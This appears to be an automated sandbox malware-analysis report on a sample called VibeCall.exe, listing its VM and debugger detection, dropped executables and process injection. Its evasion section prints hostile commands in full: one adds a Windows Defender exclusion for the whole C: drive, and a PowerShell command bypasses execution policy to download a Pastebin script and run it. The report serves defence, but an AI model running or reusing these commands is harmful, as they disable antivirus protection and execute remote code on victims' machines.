                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
                      Switches to a custom stack to bypass stack traces
                      Source: C:\Users\user\aisolution_vibecall_a.exeAPI/Special instruction interceptor: Address: 7FFE2220D044
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeAPI/Special instruction interceptor: Address: 7FFE2220D044
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeAPI/Special instruction interceptor: Address: 56FB83A
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeAPI/Special instruction interceptor: Address: 7FFE2220D044
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeAPI/Special instruction interceptor: Address: 518B83A
                      Source: C:\Users\user\Desktop\VibeCall.exeMemory allocated: 2256AB60000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\VibeCall.exeWindow / User API: threadDelayed 1815Jump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeWindow / User API: threadDelayed 352Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6967Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2728Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2584Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 995Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7518
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2262
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7748Thread sleep count: 6967 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7748Thread sleep count: 2728 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7788Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7868Thread sleep count: 2584 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7856Thread sleep count: 995 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7916Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7936Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7852Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7948Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5416Thread sleep count: 7518 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3340Thread sleep count: 2262 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5796Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_BIOS
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_BIOS
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_BIOS
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_BIOS
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_BIOS
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_BIOS
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_BIOS
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_BIOS
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_BIOS
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_BIOS
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_BIOS
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_BIOS
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_BIOS
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_BIOS
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_BIOS
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_BIOS
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_BIOS
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_BIOS
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_BIOS
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: aisolution_vibecall_a.exe, 0000000F.00000002.2577122499.0000000001126000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMCIDevSymbolK
                      Source: contry_solution_vibecall_e.exe, 00000010.00000003.2634358521.00000000036C0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: DisableGuestVmNetworkConnectivity
                      Source: contry_solution_vibecall_e.exe, 00000010.00000003.2634358521.00000000036C0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: EnableGuestVmNetworkConnectivity
                      Source: VibeCall.exe, 00000000.00000003.2426027972.000002660B33F000.00000004.00000020.00020000.00000000.sdmp, VibeCall.exe, 00000000.00000003.2177415326.000002660B33F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: powershell.exe, 00000004.00000002.2022396979.000002DA1B0EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllQQ
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\aisolution_vibecall_a.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\aisolution_vibecall_a.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\aisolution_vibecall_a.exeCode function: 15_3_01184ED5 LdrInitializeThunk,VirtualFree,15_3_01184ED5
                      Source: C:\Users\user\aisolution_vibecall_a.exeCode function: 15_3_01187D4D IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_3_01187D4D
                      Source: C:\Users\user\aisolution_vibecall_a.exeCode function: 15_3_02C80277 mov eax, dword ptr fs:[00000030h]15_3_02C80277
                      Source: C:\Users\user\aisolution_vibecall_a.exeCode function: 15_2_02C80277 mov eax, dword ptr fs:[00000030h]15_2_02C80277
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeCode function: 16_3_00FD0277 mov eax, dword ptr fs:[00000030h]16_3_00FD0277
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeCode function: 16_2_00FD0277 mov eax, dword ptr fs:[00000030h]16_2_00FD0277
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 26_3_02DF0283 mov eax, dword ptr fs:[00000030h]26_3_02DF0283
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 32_3_027F0283 mov eax, dword ptr fs:[00000030h]32_3_027F0283
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Users\user\aisolution_vibecall_a.exeCode function: 15_3_01187D4D IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_3_01187D4D
                      Source: C:\Users\user\aisolution_vibecall_a.exeCode function: 15_3_0118800F SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_3_0118800F
                      Source: C:\Users\user\aisolution_vibecall_a.exeCode function: 15_3_01194B0C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_3_01194B0C
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeCode function: 16_3_009C800F SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_3_009C800F
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeCode function: 16_3_009C7D4D IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_3_009C7D4D
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeCode function: 16_3_009D4B0C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_3_009D4B0C
                      Source: C:\Users\user\Desktop\VibeCall.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Adds a directory exclusion to Windows Defender
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'Jump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'Jump to behavior
                      Bypasses PowerShell execution policy
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr 'https://pastebin.com/raw/QE03kE1s' -UseBasicParsing).Content"
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'Jump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr 'https://pastebin.com/raw/QE03kE1s' -UseBasicParsing).Content"Jump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'Jump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Users\user\aisolution_vibecall_a.exe "C:\Users\user\aisolution_vibecall_a.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exe "C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Users\user\AppData\Local\Temp\soundsolution_vibecall_c.exe "C:\Users\user\AppData\Local\Temp\soundsolution_vibecall_c.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Users\user\videosolution_vibecall_b.exe "C:\Users\user\videosolution_vibecall_b.exe"Jump to behavior
                      Source: C:\Users\user\aisolution_vibecall_a.exeProcess created: C:\Windows\SysWOW64\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeProcess created: C:\Windows\SysWOW64\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"Jump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess created: C:\Windows\System32\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"Jump to behavior
                      Source: C:\Users\user\aisolution_vibecall_a.exeCode function: 15_3_0118781B cpuid 15_3_0118781B
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
